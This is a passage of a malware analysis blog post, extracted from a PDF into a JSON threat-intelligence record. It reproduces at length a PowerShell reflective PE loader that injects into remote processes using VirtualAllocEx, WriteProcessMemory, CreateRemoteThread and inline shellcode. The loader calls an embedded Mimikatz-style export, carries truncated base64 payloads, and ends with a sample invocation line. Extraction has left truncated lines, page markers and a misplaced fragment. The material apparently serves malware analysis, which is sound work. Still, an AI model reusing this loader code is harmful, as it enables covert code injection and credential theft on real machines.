-MemoryAddress$ProcExitFunctionAddrTmp\r\n$Win32Functions .VirtualProtect.Invoke( $ProcExitFunctionAddr ,[UInt32] $TotalSize ,[UInt32] $OldProtectFlag ,[Ref] $Old\r\nOut-Null\r\n}\r\nWrite-Output   $ReturnArray\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 43 of 57\n\n}\r\nFunction   Copy-ArrayOfMemAddresses\r\n{\r\nParam (\r\n[ Parameter ( Position   =0,Mandatory   =$true )]\r\n[Array[]]\r\n$CopyInfo ,\r\n[ Parameter ( Position   =1,Mandatory   =$true )]\r\n[System.Object]\r\n$Win32Functions ,\r\n[ Parameter ( Position   =2,Mandatory   =$true )]\r\n[System.Object]\r\n$Win32Constants\r\n)\r\n[UInt32] $OldProtectFlag   =0\r\nforeach   ( $Info   in   $CopyInfo )\r\n{\r\n$Success   =$Win32Functions .VirtualProtect.Invoke( $Info [0],[UInt32] $Info [2],[UInt32] $Win32Constants .PAGE_EXECUTE_RE\r\nif   ( $Success   -eq   $false )\r\n{\r\nThrow\"CalltoVirtualProtectfailed\"\r\n}\r\n$Win32Functions .memcpy.Invoke( $Info [0],$Info [1],[UInt64] $Info [2])|Out-Null\r\n$Win32Functions .VirtualProtect.Invoke( $Info [0],[UInt32] $Info [2],[UInt32] $OldProtectFlag ,[Ref] $OldProtectFlag )\r\nOut-Null\r\n}\r\n}\r\nFunction   Get-MemoryProcAddress\r\n{\r\nParam (\r\n[ Parameter ( Position   =0,Mandatory   =$true )]\r\n[IntPtr]\r\n$PEHandle ,\r\n[ Parameter ( Position   =1,Mandatory   =$true )]\r\n[String]\r\n$FunctionName\r\n)\r\n$Win32Types   =Get-Win32Types\r\n$Win32Constants   =Get-Win32Constants\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 44 of 57\n\n$PEInfo   =\r\nGet-PEDetailedInfo   -PEHandle$PEHandle   -Win32Types$Win32Types   -\r\nWin32Constants$Win32Constants\r\nif   ( $PEInfo .IMAGE_NT_HEADERS.OptionalHeader.ExportTable.Size-eq   0)\r\n{\r\nreturn   [IntPtr] ::Zero\r\n}\r\n$ExportTablePtr   =Add-SignedIntAsUnsigned   ( $PEHandle )\r\n( $PEInfo .IMAGE_NT_HEADERS.OptionalHeader.ExportTable.VirtualAddress)\r\n$ExportTable   =[System.Runtime.InteropServices.Marshal] ::PtrToStructure( $ExportTablePtr ,[Type] $Win32Types .IMAGE_EXPORT_D\r\nfor   ( $i   =0;$i   -lt   $ExportTable .NumberOfNames;$i ++)\r\n{\r\n$NameOffsetPtr   =Add-SignedIntAsUnsigned   ( $PEHandle )\r\n( $ExportTable .AddressOfNames+( $i   *[System.Runtime.InteropServices.Marshal] ::SizeOf( [\r\n[UInt32] )))\r\n$NamePtr   =Add-SignedIntAsUnsigned   ( $PEHandle )\r\n( [System.Runtime.InteropServices.Marshal] ::PtrToStructure( $NameOffsetPtr ,[Type]\r\n[UInt32] ))\r\n$Name   =[System.Runtime.InteropServices.Marshal] ::PtrToStringAnsi( $NamePtr )\r\nif   ( $Name   -ceq   $FunctionName )\r\n{\r\n$OrdinalPtr   =Add-SignedIntAsUnsigned   ( $PEHandle )\r\n( $ExportTable .AddressOfNameOrdinals+( $i   *[System.Runtime.InteropServices.Marshal] ::Siz\r\n[UInt16] )))\r\n$FuncIndex   =[System.Runtime.InteropServices.Marshal] ::PtrToStructure( $OrdinalPtr ,[Type]\r\n[UInt16] )\r\n$FuncOffsetAddr   =Add-SignedIntAsUnsigned   ( $PEHandle )\r\n( $ExportTable .AddressOfFunctions+( $FuncIndex   *[System.Runtime.InteropServices.Marshal]\r\n[UInt32] )))\r\n$FuncOffset   =[System.Runtime.InteropServices.Marshal] ::PtrToStructure( $FuncOffsetAddr ,[Type]\r\n[UInt32] )\r\nreturn   Add-SignedIntAsUnsigned   ( $PEHandle )( $FuncOffset )\r\n}\r\n}\r\nreturn   [IntPtr] ::Zero\r\n}\r\nFunction   Invoke-MemoryLoadLibrary\r\n{\r\nParam (\r\n[ Parameter (Position   =0,Mandatory   =$true   )]\r\n[Byte[]]\r\n$PEBytes ,\r\n[ Parameter ( Position   =1,Mandatory   =$false )]\r\n[String]\r\n$ExeArgs ,\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 45 of 57\n\n[ Parameter ( Position   =\r\n2,Mandatory   =$false )]\r\n[IntPtr]\r\n$RemoteProcHandle\r\n)\r\n$PtrSize   =[System.Runtime.InteropServices.Marshal] ::SizeOf( [Type][IntPtr] )\r\n$Win32Constants   =Get-Win32Constants\r\n$Win32Functions   =Get-Win32Functions\r\n$Win32Types   =Get-Win32Types\r\n$RemoteLoading   =$false\r\nif   (( $RemoteProcHandle   -ne   $null )-and   ( $RemoteProcHandle   -ne   [IntPtr] ::Zero))\r\n{\r\n$RemoteLoading   =$true\r\n}\r\n$PEInfo   =Get-PEBasicInfo   -PEBytes$PEBytes   -Win32Types$Win32Types\r\n$OriginalImageBase   =$PEInfo .OriginalImageBase\r\n$NXCompatible   =$true\r\nif   (( [Int]   $PEInfo .DllCharacteristics-\r\nband   $Win32Constants .IMAGE_DLLCHARACTERISTICS_NX_COMPAT)-\r\nne   $Win32Constants .IMAGE_DLLCHARACTERISTICS_NX_COMPAT)\r\n{\r\nWrite-Warning   \"PEisnotcompatiblewithDEP,mightcauseissues\"   -WarningActionContinue\r\n$NXCompatible   =$false\r\n}\r\n$Process64Bit   =$true\r\nif   ( $RemoteLoading   -eq   $true )\r\n{\r\n$Kernel32Handle   =$Win32Functions .GetModuleHandle.Invoke( \"kernel32.dll\" )\r\n$Result   =$Win32Functions .GetProcAddress.Invoke( $Kernel32Handle ,\"IsWow64Process\" )\r\nif   ( $Result   -eq   [IntPtr] ::Zero)\r\n{\r\nThrow\"Couldn'tlocateIsWow64Processfunctiontodetermineiftargetprocessis32bitor64bit\"\r\n}\r\n[Bool] $Wow64Process   =$false\r\n$Success   =$Win32Functions .IsWow64Process.Invoke( $RemoteProcHandle ,[Ref] $Wow64Process )\r\nif   ( $Success   -eq   $false )\r\n{\r\nThrow\"CalltoIsWow64Processfailed\"\r\n}\r\nif   (( $Wow64Process   -eq   $true )-or   (( $Wow64Process   -eq   $false )-\r\nand   ( [System.Runtime.InteropServices.Marshal] ::SizeOf( [Type][IntPtr] )-eq   4)))\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 46 of 57\n\n{\r\n$Process64Bit   =$false\r\n}\r\n$PowerShell64Bit   =$true\r\nif   ( [System.Runtime.InteropServices.Marshal] ::SizeOf( [Type][IntPtr] )-ne   8)\r\n{\r\n$PowerShell64Bit   =$false\r\n}\r\nif   ( $PowerShell64Bit   -ne   $Process64Bit )\r\n{\r\nthrow\"PowerShellmustbesamearchitecture(x86/x64)asPEbeingloadedandremoteprocess\"\r\n}\r\n}\r\nelse\r\n{\r\nif   ( [System.Runtime.InteropServices.Marshal] ::SizeOf( [Type][IntPtr] )-ne   8)\r\n{\r\n$Process64Bit   =$false\r\n}\r\n}\r\nif   ( $Process64Bit   -ne   $PEInfo .PE64Bit)\r\n{\r\nThrow\"PEplatformdoesn'tmatchthearchitectureoftheprocessitisbeingloadedin(32/64bit)\"\r\n}\r\n[IntPtr] $LoadAddr   =[IntPtr] ::Zero\r\nif   (( [Int]   $PEInfo .DllCharacteristics-\r\nband   $Win32Constants .IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)-\r\nne   $Win32Constants .IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)\r\n{\r\nWrite-Warning   \"PE\r\nfilebeingreflectivelyloadedisnotASLRcompatible.Iftheloadingfails,tryrestartingPowerShellandtryingagain\"   -\r\nWarningActionContinue\r\n[IntPtr] $LoadAddr   =$OriginalImageBase\r\n}\r\n$PEHandle   =[IntPtr] ::Zero\r\n$EffectivePEHandle   =[IntPtr] ::Zero\r\nif   ( $RemoteLoading   -eq   $true )\r\n{\r\n$PEHandle   =$Win32Functions .VirtualAlloc.Invoke( [IntPtr] ::Zero,[UIntPtr] $PEInfo .SizeOfImage,$Win32Constants .MEM_COMM\r\nbor   $Win32Constants .MEM_RESERVE,$Win32Constants .PAGE_READWRITE)\r\n$EffectivePEHandle   =$Win32Functions .VirtualAllocEx.Invoke( $RemoteProcHandle ,$LoadAddr ,[UIntPtr] $PEInfo .SizeOfImage,\r\nbor   $Win32Constants .MEM_RESERVE,$Win32Constants .PAGE_EXECUTE_READWRITE)\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 47 of 57\n\nif   ( $EffectivePEHandle   -eq   [IntPtr] ::Zero)\r\n{\r\nThrow\"Unabletoallocatememoryintheremoteprocess.IfthePEbeingloadeddoesn'tsupportASLR,itcouldbethattherequestedba\r\n}\r\n}\r\nelse\r\n{\r\nif   ( $NXCompatible   -eq   $true )\r\n{\r\n$PEHandle   =$Win32Functions .VirtualAlloc.Invoke( $LoadAddr ,[UIntPtr] $PEInfo .SizeOfImage,$Win32Constants .MEM_COMMIT\r\nbor   $Win32Constants .MEM_RESERVE,$Win32Constants .PAGE_READWRITE)\r\n}\r\nelse\r\n{\r\n$PEHandle   =$Win32Functions .VirtualAlloc.Invoke( $LoadAddr ,[UIntPtr] $PEInfo .SizeOfImage,$Win32Constants .MEM_COMMIT\r\nbor   $Win32Constants .MEM_RESERVE,$Win32Constants .PAGE_EXECUTE_READWRITE)\r\n}\r\n$EffectivePEHandle   =$PEHandle\r\n}\r\n[IntPtr] $PEEndAddress   =Add-SignedIntAsUnsigned   ( $PEHandle )( [Int64] $PEInfo .SizeOfImage)\r\nif   ( $PEHandle   -eq   [IntPtr] ::Zero)\r\n{\r\nThrow\"VirtualAllocfailedtoallocatememoryforPE.IfPEisnotASLRcompatible,tryrunningthescriptinanewPowerShellprocess\r\n}\r\n[System.Runtime.InteropServices.Marshal] ::Copy( $PEBytes ,0,$PEHandle ,$PEInfo .SizeOfHeaders)|\r\nOut-Null\r\n$PEInfo   =Get-PEDetailedInfo   -PEHandle$PEHandle   -Win32Types$Win32Types   -\r\nWin32Constants$Win32Constants\r\n$PEInfo   |Add-Member   -MemberTypeNoteProperty-NameEndAddress-Value$PEEndAddress\r\n$PEInfo   |Add-Member   -MemberTypeNoteProperty-NameEffectivePEHandle-Value$EffectivePEHandle\r\nCopy-Sections   -PEBytes$PEBytes   -PEInfo$PEInfo   -Win32Functions$Win32Functions   -\r\nWin32Types$Win32Types\r\nUpdate-MemoryAddresses   -PEInfo$PEInfo   -OriginalImageBase$OriginalImageBase   -\r\nWin32Constants$Win32Constants   -Win32Types$Win32Types\r\nif   ( $RemoteLoading   -eq   $true )\r\n{\r\nImport-DllImports   -PEInfo$PEInfo   -Win32Functions$Win32Functions   -Win32Types$Win32Types   -\r\nWin32Constants$Win32Constants   -RemoteProcHandle$RemoteProcHandle\r\n}\r\nelse\r\n{\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 48 of 57\n\nImport-DllImports   -PEInfo\r\n$PEInfo   -Win32Functions$Win32Functions   -Win32Types$Win32Types   -\r\nWin32Constants$Win32Constants\r\n}\r\nif   ( $RemoteLoading   -eq   $false )\r\n{\r\nif   ( $NXCompatible   -eq   $true )\r\n{\r\nUpdate-MemoryProtectionFlags   -PEInfo$PEInfo   -Win32Functions$Win32Functions   -\r\nWin32Constants$Win32Constants   -Win32Types$Win32Types\r\n}\r\nelse\r\n{\r\n}\r\n}\r\nelse\r\n{\r\n}\r\nif   ( $RemoteLoading   -eq   $true )\r\n{\r\n[UInt32] $NumBytesWritten   =0\r\n$Success   =$Win32Functions .WriteProcessMemory.Invoke( $RemoteProcHandle ,$EffectivePEHandle ,$PEHandle ,[UIntPtr]\r\n( $PEInfo .SizeOfImage),[Ref] $NumBytesWritten )\r\nif   ( $Success   -eq   $false )\r\n{\r\nThrow\"Unabletowriteshellcodetoremoteprocessmemory.\"\r\n}\r\n}\r\nif   ( $PEInfo .FileType-ieq   \"DLL\" )\r\n{\r\nif   ( $RemoteLoading   -eq   $false )\r\n{\r\n$DllMainPtr   =Add-SignedIntAsUnsigned   ( $PEInfo .PEHandle)\r\n( $PEInfo .IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)\r\n$DllMainDelegate   =Get-DelegateType   @( [IntPtr] ,[UInt32] ,[IntPtr] )( [Bool] )\r\n$DllMain   =[System.Runtime.InteropServices.Marshal] ::GetDelegateForFunctionPointer( $DllMainPtr ,$DllMainDelegate )\r\n$DllMain .Invoke( $PEInfo .PEHandle,1,[IntPtr] ::Zero)|Out-Null\r\n}\r\nelse\r\n{\r\n$DllMainPtr   =Add-SignedIntAsUnsigned   ( $EffectivePEHandle )\r\n( $PEInfo .IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 49 of 57\n\nif   ( $PEInfo .PE64Bit\r\n-eq   $true )\r\n{\r\n$CallDllMainSC1   =@(0x53,0x48,0x89,0xe3,0x66,0x83,0xe4,0x00,0x48,0xb9)\r\n$CallDllMainSC2   =@(0xba,0x01,0x00,0x00,0x00,0x41,0xb8,0x00,0x00,0x00,0x00,0x48,0xb8)\r\n$CallDllMainSC3   =@(0xff,0xd0,0x48,0x89,0xdc,0x5b,0xc3)\r\n}\r\nelse\r\n{\r\n$CallDllMainSC1   =@(0x53,0x89,0xe3,0x83,0xe4,0xf0,0xb9)\r\n$CallDllMainSC2   =@(0xba,0x01,0x00,0x00,0x00,0xb8,0x00,0x00,0x00,0x00,0x50,0x52,0x51,0xb8)\r\n$CallDllMainSC3   =@(0xff,0xd0,0x89,0xdc,0x5b,0xc3)\r\n}\r\n$SCLength   =$CallDllMainSC1 .Length+$CallDllMainSC2 .Length+$CallDllMainSC3 .Length+( $PtrSize   *2)\r\n$SCPSMem   =[System.Runtime.InteropServices.Marshal] ::AllocHGlobal( $SCLength )\r\n$SCPSMemOriginal   =$SCPSMem\r\nWrite-BytesToMemory   -Bytes$CallDllMainSC1   -MemoryAddress$SCPSMem\r\n$SCPSMem   =Add-SignedIntAsUnsigned   $SCPSMem   ( $CallDllMainSC1 .Length)\r\n[System.Runtime.InteropServices.Marshal] ::StructureToPtr( $EffectivePEHandle ,$SCPSMem ,$false )\r\n$SCPSMem   =Add-SignedIntAsUnsigned   $SCPSMem   ( $PtrSize )\r\nWrite-BytesToMemory   -Bytes$CallDllMainSC2   -MemoryAddress$SCPSMem\r\n$SCPSMem   =Add-SignedIntAsUnsigned   $SCPSMem   ( $CallDllMainSC2 .Length)\r\n[System.Runtime.InteropServices.Marshal] ::StructureToPtr( $DllMainPtr ,$SCPSMem ,$false )\r\n$SCPSMem   =Add-SignedIntAsUnsigned   $SCPSMem   ( $PtrSize )\r\nWrite-BytesToMemory   -Bytes$CallDllMainSC3   -MemoryAddress$SCPSMem\r\n$SCPSMem   =Add-SignedIntAsUnsigned   $SCPSMem   ( $CallDllMainSC3 .Length)\r\n$RSCAddr   =$Win32Functions .VirtualAllocEx.Invoke( $RemoteProcHandle ,[IntPtr] ::Zero,[UIntPtr]\r\n[UInt64] $SCLength ,$Win32Constants .MEM_COMMIT-\r\nbor   $Win32Constants .MEM_RESERVE,$Win32Constants .PAGE_EXECUTE_READWRITE)\r\nif   ( $RSCAddr   -eq   [IntPtr] ::Zero)\r\n{\r\nThrow\"Unabletoallocatememoryintheremoteprocessforshellcode\"\r\n}\r\n$Success   =$Win32Functions .WriteProcessMemory.Invoke( $RemoteProcHandle ,$RSCAddr ,$SCPSMemOriginal ,[UIntPtr]\r\n[UInt64] $SCLength ,[Ref] $NumBytesWritten )\r\nif   (( $Success   -eq   $false )-or   ( [UInt64] $NumBytesWritten   -ne   [UInt64] $SCLength ))\r\n{\r\nThrow\"Unabletowriteshellcodetoremoteprocessmemory.\"\r\n}\r\n$RThreadHandle   =Invoke-CreateRemoteThread   -ProcessHandle$RemoteProcHandle   -\r\nStartAddress$RSCAddr   -Win32Functions$Win32Functions\r\n$Result   =$Win32Functions .WaitForSingleObject.Invoke( $RThreadHandle ,20000)\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 50 of 57\n\nif   ( $Result   -ne   0)\r\n{\r\nThrow\"CalltoCreateRemoteThreadtocallGetProcAddressfailed.\"\r\n}\r\n$Win32Functions .VirtualFreeEx.Invoke( $RemoteProcHandle ,$RSCAddr ,[UIntPtr]\r\n[UInt64] 0,$Win32Constants .MEM_RELEASE)|Out-Null\r\n}\r\n}\r\nelseif   ( $PEInfo .FileType-ieq   \"EXE\" )\r\n{\r\n[IntPtr] $ExeDoneBytePtr   =[System.Runtime.InteropServices.Marshal] ::AllocHGlobal(1)\r\n[System.Runtime.InteropServices.Marshal] ::WriteByte( $ExeDoneBytePtr ,0,0x00)\r\n$OverwrittenMemInfo   =Update-ExeFunctions   -PEInfo$PEInfo   -Win32Functions$Win32Functions   -\r\nWin32Constants$Win32Constants   -ExeArguments$ExeArgs   -ExeDoneBytePtr$ExeDoneBytePtr\r\n[IntPtr] $ExeMainPtr   =Add-SignedIntAsUnsigned   ( $PEInfo .PEHandle)\r\n( $PEInfo .IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)\r\n$Win32Functions .CreateThread.Invoke( [IntPtr] ::Zero,[IntPtr] ::Zero,$ExeMainPtr ,[IntPtr] ::Zero,( [UInt32] 0),[Re\r\n( [UInt32] 0))|Out-Null\r\nwhile ( $true )\r\n{\r\n[Byte] $ThreadDone   =[System.Runtime.InteropServices.Marshal] ::ReadByte( $ExeDoneBytePtr ,0)\r\nif   ( $ThreadDone   -eq   1)\r\n{\r\nCopy-ArrayOfMemAddresses   -CopyInfo$OverwrittenMemInfo   -Win32Functions$Win32Functions   -\r\nWin32Constants$Win32Constants\r\nbreak\r\n}\r\nelse\r\n{\r\nStart-Sleep   -Seconds1\r\n}\r\n}\r\n}\r\nreturn   @( $PEInfo .PEHandle,$EffectivePEHandle )\r\n}\r\nFunction   Invoke-MemoryFreeLibrary\r\n{\r\nParam (\r\n[ Parameter ( Position =0,Mandatory = $true )]\r\n[IntPtr]\r\n$PEHandle\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 51 of 57\n\n)\r\n$Win32Constants   =Get-Win32Constants\r\n$Win32Functions   =Get-Win32Functions\r\n$Win32Types   =Get-Win32Types\r\n$PEInfo   =Get-PEDetailedInfo   -PEHandle$PEHandle   -Win32Types$Win32Types   -\r\nWin32Constants$Win32Constants\r\nif   ( $PEInfo .IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size-gt   0)\r\n{\r\n[IntPtr] $ImportDescriptorPtr   =Add-SignedIntAsUnsigned   ( [Int64] $PEInfo .PEHandle)\r\n( [Int64] $PEInfo .IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)\r\nwhile   ( $true )\r\n{\r\n$ImportDescriptor   =[System.Runtime.InteropServices.Marshal] ::PtrToStructure( $ImportDescriptorPtr ,[Type] $Win32Types .IMAG\r\nif   ( $ImportDescriptor .Characteristics-eq   0`\r\n-and   $ImportDescriptor .FirstThunk-eq   0`\r\n-and   $ImportDescriptor .ForwarderChain-eq   0`\r\n-and   $ImportDescriptor .Name-eq   0`\r\n-and   $ImportDescriptor .TimeDateStamp-eq   0)\r\n{\r\nbreak\r\n}\r\n$ImportDllPath   =[System.Runtime.InteropServices.Marshal] ::PtrToStringAnsi(( Add-SignedIntAsUnsigned   ( [Int64] $PEInfo .PEHandle)\r\n( [Int64] $ImportDescriptor .Name)))\r\n$ImportDllHandle   =$Win32Functions .GetModuleHandle.Invoke( $ImportDllPath )\r\nif   ( $ImportDllHandle   -eq   $null )\r\n{\r\nWrite-Warning   \"Error\r\ngettingDLLhandleinMemoryFreeLibrary,DLLName:$ImportDllPath.Continuinganyways\"   -\r\nWarningActionContinue\r\n}\r\n$Success   =$Win32Functions .FreeLibrary.Invoke( $ImportDllHandle )\r\nif   ( $Success   -eq   $false )\r\n{\r\nWrite-Warning   \"Unabletofreelibrary:$ImportDllPath.Continuinganyways.\"   -WarningActionContinue\r\n}\r\n$ImportDescriptorPtr   =Add-SignedIntAsUnsigned   ( $ImportDescriptorPtr )\r\n( [System.Runtime.InteropServices.Marshal] ::SizeOf( [Type] $Win32Types .IMAGE_IMPOR\r\n}\r\n}\r\n$Success   =$Win32Functions .VirtualFree.Invoke( $PEHandle ,[UInt64] 0,$Win32Constants .MEM_RELEASE)\r\nif   ( $Success   -eq   $false )\r\n{\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 52 of 57\n\nWrite-Warning   \"Unable\r\ntocallVirtualFreeonthePE'smemory.Continuinganyways.\"   -\r\nWarningActionContinue\r\n}\r\n}\r\nFunction   Main\r\n{\r\n$Win32Functions   =Get-Win32Functions\r\n$Win32Types   =Get-Win32Types\r\n$Win32Constants   =Get-Win32Constants\r\n$RemoteProcHandle   =[IntPtr] ::Zero\r\nif   (( $ProcId   -ne   $null )-and   ( $ProcId   -ne   0)-and   ( $ProcName   -ne   $null )-\r\nand   ( $ProcName   -ne   \" \"))\r\n{\r\nThrow\" Can 'tsupplyaProcIdandProcName,chooseoneortheother\"\r\n}\r\nelseif($ProcName-ne$null-and$ProcName-ne\"\")\r\n{\r\n$Processes=@(Get-Process-Name$ProcName-ErrorActionSilentlyContinue)\r\nif($Processes.Count-eq0)\r\n{\r\nThrow\"Can' tfindprocess   $ProcName \"\r\n}\r\nelseif($Processes.Count-gt1)\r\n{\r\n$ProcInfo=Get-Process|where{$_.Name-eq$ProcName}|Select-ObjectProcessName,Id,SessionId\r\nWrite-Output$ProcInfo\r\nThrow\" Morethanoneinstanceof$ProcName   found,pleasespecifytheprocess   IDtoinjectin   to. \"\r\n}\r\nelse\r\n{\r\n$ProcId=$Processes[0].ID\r\n}\r\n}\r\nif(($ProcId-ne$null)-and($ProcId-ne0))\r\n{\r\n$RemoteProcHandle=$Win32Functions.OpenProcess.Invoke(0x001F0FFF,$false,$ProcId)\r\nif($RemoteProcHandle-eq[IntPtr]::Zero)\r\n{\r\nThrow\" Couldn 'tobtainthehandleforprocessID:$ProcId\"\r\n}\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 53 of 57\n\n}\r\ntry\r\n{\r\n$Processors=Get-WmiObject-ClassWin32_Processor\r\n}\r\ncatch\r\n{\r\nthrow($_.Exception)\r\n}\r\nif($Processors-is[array])\r\n{\r\n$Processor=$Processors[0]\r\n}else{\r\n$Processor=$Processors\r\n}\r\nif(($Processor.AddressWidth)-ne(([System.IntPtr]::Size)*8))\r\n{\r\nWrite-Error\r\n\"PowerShellarchitecture(32bit/64bit)doesn' tmatchOSarchitecture.64bitPSmustbeusedona64bitOS. \"-\r\nErrorActionStop\r\n}\r\nif([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])-eq8)\r\n{\r\n[Byte[]]$PEBytes=[Byte[]][Convert]::FromBase64String($PEBytes64)\r\n}\r\nelse\r\n{\r\n[Byte[]]$PEBytes=[Byte[]][Convert]::FromBase64String($PEBytes32)\r\n}\r\n$PEBytes[0]=0\r\n$PEBytes[1]=0\r\n$PEHandle=[IntPtr]::Zero\r\nif($RemoteProcHandle-eq[IntPtr]::Zero)\r\n{\r\n$PELoadedInfo=Invoke-MemoryLoadLibrary-PEBytes$PEBytes-ExeArgs$ExeArgs\r\n}\r\nelse\r\n{\r\n$PELoadedInfo=Invoke-MemoryLoadLibrary-PEBytes$PEBytes-ExeArgs$ExeArgs-\r\nRemoteProcHandle$RemoteProcHandle\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 54 of 57\n\n}\r\nif($PELoadedInfo-eq[IntPtr]::Zero)\r\n{\r\nThrow\" UnabletoloadPE,handlereturnedisNULL \"\r\n}\r\n$PEHandle=$PELoadedInfo[0]\r\n$RemotePEHandle=$PELoadedInfo[1]\r\n$PEInfo=Get-PEDetailedInfo-PEHandle$PEHandle-Win32Types$Win32Types-Win32Constants$Win32Constants\r\nif(($PEInfo.FileType-ieq\" DLL \")-and($RemoteProcHandle-eq[IntPtr]::Zero))\r\n{\r\n[IntPtr]$WStringFuncAddr=Get-MemoryProcAddress-PEHandle$PEHandle-\r\nFunctionName\" powershell_reflective_mimikatz \"\r\nif($WStringFuncAddr-eq[IntPtr]::Zero)\r\n{\r\nThrow\" Couldn 'tfindfunctionaddress.\"\r\n}\r\n$WStringFuncDelegate=Get-DelegateType@([IntPtr])([IntPtr])\r\n$WStringFunc=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WStringFuncAddr,$WStringFuncDelegate)\r\n$WStringInput=[System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArgs)\r\n[IntPtr]$OutputPtr=$WStringFunc.Invoke($WStringInput)\r\n[System.Runtime.InteropServices.Marshal]::FreeHGlobal($WStringInput)\r\nif($OutputPtr-eq[IntPtr]::Zero)\r\n{\r\nThrow\"Unabletogetoutput,OutputPtrisNULL\"\r\n}\r\nelse\r\n{\r\n$Output=[System.Runtime.InteropServices.Marshal]::PtrToStringUni($OutputPtr)\r\nWrite-Output$Output\r\n$Win32Functions.LocalFree.Invoke($OutputPtr);\r\n}\r\n}\r\nelseif(($PEInfo.FileType-ieq\"DLL\")-and($RemoteProcHandle-ne[IntPtr]::Zero))\r\n{\r\n$VoidFuncAddr=Get-MemoryProcAddress-PEHandle$PEHandle-FunctionName\"VoidFunc\"\r\nif(($VoidFuncAddr-eq$null)-or($VoidFuncAddr-eq[IntPtr]::Zero))\r\n{\r\nThrow\"VoidFunccouldn' tbefoundin   theDLL \"\r\n}\r\n$VoidFuncAddr=Sub-SignedIntAsUnsigned$VoidFuncAddr$PEHandle\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 55 of 57\n\n$VoidFuncAddr\r\n=Add-SignedIntAsUnsigned$VoidFuncAddr$RemotePEHandle\r\n$RThreadHandle=Invoke-CreateRemoteThread-ProcessHandle$RemoteProcHandle-StartAddress$VoidFuncAddr-\r\nWin32Functions$Win32Functions\r\n}\r\nif($RemoteProcHandle-eq[IntPtr]::Zero)\r\n{\r\nInvoke-MemoryFreeLibrary-PEHandle$PEHandle\r\n}\r\nelse\r\n{\r\n$Success=$Win32Functions.VirtualFree.Invoke($PEHandle,[UInt64]0,$Win32Constants.MEM_RELEASE)\r\nif($Success-eq$false)\r\n{\r\nWrite-Warning\" UnabletocallVirtualFreeonthePE 'smemory.Continuinganyways.\"-\r\nWarningActionContinue\r\n}\r\n}\r\n}\r\nMain\r\n}\r\nFunctionMain\r\n{\r\nif(($PSCmdlet.MyInvocation.BoundParameters[\"Debug\"]-ne$null)-\r\nand$PSCmdlet.MyInvocation.BoundParameters[\"Debug\"].IsPresent)\r\n{\r\n$DebugPreference=\"Continue\"\r\n}\r\n$ExeArgs=\"\"\r\nif($versid-eq\"bind\")\r\n{\r\n$ExeArgs=\"notepad.exebind$idsid$rckey\"\r\n}\r\nelseif($versid-eq\"atinmem\")\r\n{\r\n$ExeArgs=\"notepad.exe$fpath$idsid$rckey\"\r\n}\r\nelse\r\n{\r\n}\r\n[System.IO.Directory]::SetCurrentDirectory($pwd)\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 56 of 57\n\n$PEBytes64\r\n=' TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFt\r\n$PEBytes32=' TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFt\r\nif($ComputerName-eq$null-or$ComputerName-imatch\"^\\s*$\")\r\n{\r\nInvoke-Command-ScriptBlock$RemoteScriptBlock-\r\nArgumentList@($PEBytes64,$PEBytes32,\"Void\",0,\"\",$ExeArgs)\r\n}\r\nelse\r\n{\r\nInvoke-Command-ScriptBlock$RemoteScriptBlock-\r\nArgumentList@($PEBytes64,$PEBytes32,\"Void\",0,\"\",$ExeArgs)-ComputerName$ComputerName\r\n}\r\n}\r\nMain\r\n}\r\nget-fgruvers-versidatinmem-fpath' pathdiscardedbymalanalyst '-idsid1215-\r\nrckey' keydiscardedbymalanalyst'\r\nSource: https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 57 of 57\n\nfor ( $i { = 0; $i -lt $Value1Bytes .Count; $i ++)\n[UInt16] $Sum = $Value1Bytes [ $i ] + $Value2Bytes [ $i ] + $CarryOver\n$FinalBytes [ $i ] = $Sum-band 0x00FF \nif (( $Sum -band 0xFF00)-eq 0x100) \n  Page 15 of 57",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/"
	],
	"report_names": [
		"multi-stage-powershell-script"
	],
	"threat_actors": [],
	"ts_created_at": 1775434789,
	"ts_updated_at": 1775826761,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
